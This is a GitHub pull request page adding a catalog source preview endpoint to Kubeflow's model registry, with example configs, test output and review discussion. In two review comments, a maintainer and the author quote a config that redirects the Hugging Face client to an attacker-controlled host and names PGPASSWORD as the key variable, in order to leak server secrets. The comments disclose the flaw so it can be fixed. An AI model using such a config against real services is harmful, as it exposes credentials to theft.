Skip to content

feat: catalog preview endpoint#1918

Merged
google-oss-prow[bot] merged 15 commits intokubeflow:mainfrom
Al-Pragliola:al-pragliola-catalog-preview-endpoint
Dec 5, 2025
Merged

feat: catalog preview endpoint#1918
google-oss-prow[bot] merged 15 commits intokubeflow:mainfrom
Al-Pragliola:al-pragliola-catalog-preview-endpoint

Conversation

@Al-Pragliola
Copy link
Copy Markdown
Contributor

@Al-Pragliola Al-Pragliola commented Nov 24, 2025

Description

In this PR we add a Catalog Source Preview feature that allows users to test and validate catalog source configurations before applying them to the model registry.

Key Features

  • New Preview Endpoint (POST /api/model_catalog/v1alpha1/sources/preview): Test your source configuration and see which models would be included or excluded based on your filters
  • Two Preview Modes:
    • Stateless mode: Upload both config and catalog data files to preview new sources without saving anything to the server
    • Path mode: Reference existing catalog files on the server to preview changes to saved sources
  • Hugging Face Source Support: Preview models directly from Hugging Face with API key authentication, including a configurable model limit safeguard
  • Filter Status Filtering: Query results by all, included, or excluded status to easily see the effect of your include/exclude patterns
  • Improved Pattern Documentation: Enhanced OpenAPI docs explaining the glob pattern syntax (* wildcard, case-insensitivity, anchored matching)

Bug Fixes

  • Fixed a panic when using pageSize < 1

Examples


YAML Source Example

config.yaml (source configuration):

type: yaml
includedModels:
  - "ibm-granite/*"
  - "meta-llama/*"
  - "mistralai/*"
excludedModels:
  - "*-draft"
  - "*-experimental"
properties:
  yamlCatalogPath: "models-catalog.yaml"  # only needed for path-based mode

catalogData.yaml (optional, for stateless mode):

models:
  - name: ibm-granite/granite-3.0-8b-instruct
    description: Granite 8B Instruct model
  - name: ibm-granite/granite-3.0-2b-draft
    description: Draft version (will be excluded)
  - name: meta-llama/Llama-2-7b-hf
    description: Llama 2 7B

Hugging Face Source Example

config.yaml:

type: hf
includedModels:
  - "microsoft/*"
  - "google/*"
  - "ibm-granite/*"
excludedModels:
  - "*-gguf"
  - "*-experimental"
properties:
  maxModels: 100          # limit per pattern (default: 500)
  apiKeyEnvVar: HF_API_KEY  # env var name (default: HF_API_KEY)

How Has This Been Tested?

local dev environment -- valid HF api key -- unit tests

Merge criteria:

  • All the commits have been signed-off (To pass the DCO check)
  • The commits have meaningful messages
  • Automated tests are provided as part of the PR for major new functionalities; testing instructions have been added in the PR body (for PRs involving changes that are not immediately obvious).
  • The developer has manually tested the changes and verified that the changes work.
  • Code changes follow the kubeflow contribution guidelines.
  • For first time contributors: Please reach out to the Reviewers to ensure all tests are being run, ensuring the label ok-to-test has been added to the PR.

@Al-Pragliola
Copy link
Copy Markdown
Contributor Author

cc @mturley @manaswinidas

@Al-Pragliola Al-Pragliola force-pushed the al-pragliola-catalog-preview-endpoint branch 2 times, most recently from 61c39ee to 4730746 Compare December 3, 2025 16:47
@Al-Pragliola Al-Pragliola marked this pull request as ready for review December 4, 2025 17:26
@google-oss-prow google-oss-prow Bot requested a review from jonburdo December 4, 2025 17:26
Copy link
Copy Markdown
Member

@pboyd pboyd left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I'm still testing this, but I see a security problem with the HF preview functionality. The ability to set the URL and the environment variable name would allow an attacker to leak at least the HF token and (unless I missed some validation) unrelated environment variables. For example:

type: hf
includedModels:
  - "microsoft/*"
properties:
  apiKeyEnvVar: PGPASSWORD
  url: https://some-attacker-controlled-domain.com

Copy link
Copy Markdown
Member

@pboyd pboyd left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Outside of the security thing, and the merge conflict this looks really good. I tested it and it's working well.

For anyone else who wants to try it:

$ curl -s -F config=@config.yaml -F catalogData=@catalog/internal/catalog/testdata/dev-community-models.yaml 'http://localhost:8082/api/model_catalog/v1alpha1/sources/preview' | jq .
{
  "items": [
    {
      "included": true,
      "name": "open-models/falcon-mini-2b"
    },
    {
      "included": true,
      "name": "quantum-research/sentiment-analyzer-base"
    },
    {
      "included": true,
      "name": "indie-ai/creative-writer-3b"
    },
    {
      "included": true,
      "name": "alpha-labs/translation-mini-1b"
    }
  ],
  "nextPageToken": "",
  "pageSize": 10,
  "size": 4,
  "summary": {
    "excludedModels": 0,
    "includedModels": 4,
    "totalModels": 4
  }
}

Where config.yaml is:

type: yaml

One thing that's a little annoying is that I can't use just paste a full source config entry. For instance, I took this from dev-sources.yaml:

name: "Community and Custom Models"
id: community_custom_models
type: yaml
enabled: true

But I can't preview it because of the extra fields (name, id, enabled). I know they're meaningless for preview, but could it ignore the extra fields so we can preview the same format that we'll save later?

Signed-off-by: Alessio Pragliola <seth.pro@gmail.com>
Signed-off-by: Alessio Pragliola <seth.pro@gmail.com>
Signed-off-by: Alessio Pragliola <seth.pro@gmail.com>
Signed-off-by: Alessio Pragliola <seth.pro@gmail.com>
Signed-off-by: Alessio Pragliola <seth.pro@gmail.com>
Signed-off-by: Alessio Pragliola <seth.pro@gmail.com>
Signed-off-by: Alessio Pragliola <seth.pro@gmail.com>
Signed-off-by: Alessio Pragliola <seth.pro@gmail.com>
Signed-off-by: Alessio Pragliola <seth.pro@gmail.com>
Signed-off-by: Alessio Pragliola <seth.pro@gmail.com>
Signed-off-by: Alessio Pragliola <seth.pro@gmail.com>
@Al-Pragliola Al-Pragliola force-pushed the al-pragliola-catalog-preview-endpoint branch from c3e7cdf to f33d223 Compare December 5, 2025 15:45
Signed-off-by: Alessio Pragliola <seth.pro@gmail.com>
Signed-off-by: Alessio Pragliola <seth.pro@gmail.com>
Signed-off-by: Alessio Pragliola <seth.pro@gmail.com>
@Al-Pragliola
Copy link
Copy Markdown
Contributor Author

I'm still testing this, but I see a security problem with the HF preview functionality. The ability to set the URL and the environment variable name would allow an attacker to leak at least the HF token and (unless I missed some validation) unrelated environment variables. For example:

type: hf
includedModels:
  - "microsoft/*"
properties:
  apiKeyEnvVar: PGPASSWORD
  url: https://some-attacker-controlled-domain.com

thanks for your review @pboyd , yes indeed this a serious security concern!

I added a logic in preview to delete the url property here 1ae1751 and I have also added a log warning when someone tries to use a custom url for the hf type a69d9db

@Al-Pragliola
Copy link
Copy Markdown
Contributor Author

Outside of the security thing, and the merge conflict this looks really good. I tested it and it's working well.

For anyone else who wants to try it:

$ curl -s -F config=@config.yaml -F catalogData=@catalog/internal/catalog/testdata/dev-community-models.yaml 'http://localhost:8082/api/model_catalog/v1alpha1/sources/preview' | jq .
{
  "items": [
    {
      "included": true,
      "name": "open-models/falcon-mini-2b"
    },
    {
      "included": true,
      "name": "quantum-research/sentiment-analyzer-base"
    },
    {
      "included": true,
      "name": "indie-ai/creative-writer-3b"
    },
    {
      "included": true,
      "name": "alpha-labs/translation-mini-1b"
    }
  ],
  "nextPageToken": "",
  "pageSize": 10,
  "size": 4,
  "summary": {
    "excludedModels": 0,
    "includedModels": 4,
    "totalModels": 4
  }
}

Where config.yaml is:

type: yaml

One thing that's a little annoying is that I can't use just paste a full source config entry. For instance, I took this from dev-sources.yaml:

name: "Community and Custom Models"
id: community_custom_models
type: yaml
enabled: true

But I can't preview it because of the extra fields (name, id, enabled). I know they're meaningless for preview, but could it ignore the extra fields so we can preview the same format that we'll save later?

After f9a85f1 it should be possible the use a full source

@Al-Pragliola Al-Pragliola requested a review from pboyd December 5, 2025 16:30
@pboyd
Copy link
Copy Markdown
Member

pboyd commented Dec 5, 2025

Thanks for the fixes.

/lgtm
/retest

Signed-off-by: Alessio Pragliola <seth.pro@gmail.com>
@google-oss-prow google-oss-prow Bot removed the lgtm label Dec 5, 2025
Copy link
Copy Markdown
Member

@pboyd pboyd left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

/lgtm

@google-oss-prow google-oss-prow Bot added the lgtm label Dec 5, 2025
@Al-Pragliola
Copy link
Copy Markdown
Contributor Author

@google-oss-prow
Copy link
Copy Markdown
Contributor

[APPROVALNOTIFIER] This PR is APPROVED

This pull-request has been approved by: Al-Pragliola

The full list of commands accepted by this bot can be found here.

The pull request process is described here

Details Needs approval from an approver in each of these files:

Approvers can indicate their approval by writing /approve in a comment
Approvers can cancel approval by writing /approve cancel in a comment

@google-oss-prow google-oss-prow Bot merged commit 6920bc9 into kubeflow:main Dec 5, 2025
23 checks passed
@Al-Pragliola Al-Pragliola deleted the al-pragliola-catalog-preview-endpoint branch December 5, 2025 18:51
adysenrothman added a commit to opendatahub-io/model-registry that referenced this pull request Dec 9, 2025
sync: main to stable
keep [1891](kubeflow#1891)
keep [1959](kubeflow#1959)
keep [1961](kubeflow#1961)
keep [1955](kubeflow#1955)
keep [1957](kubeflow#1957)
keep [1918](kubeflow#1918)
keep [759](#759)
keep [1975](kubeflow#1975)
keep [1976](kubeflow#1976)
keep [1963](kubeflow#1963)
keep [801](#801)
@Al-Pragliola Al-Pragliola restored the al-pragliola-catalog-preview-endpoint branch December 10, 2025 18:46
@Al-Pragliola Al-Pragliola deleted the al-pragliola-catalog-preview-endpoint branch December 11, 2025 15:29
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants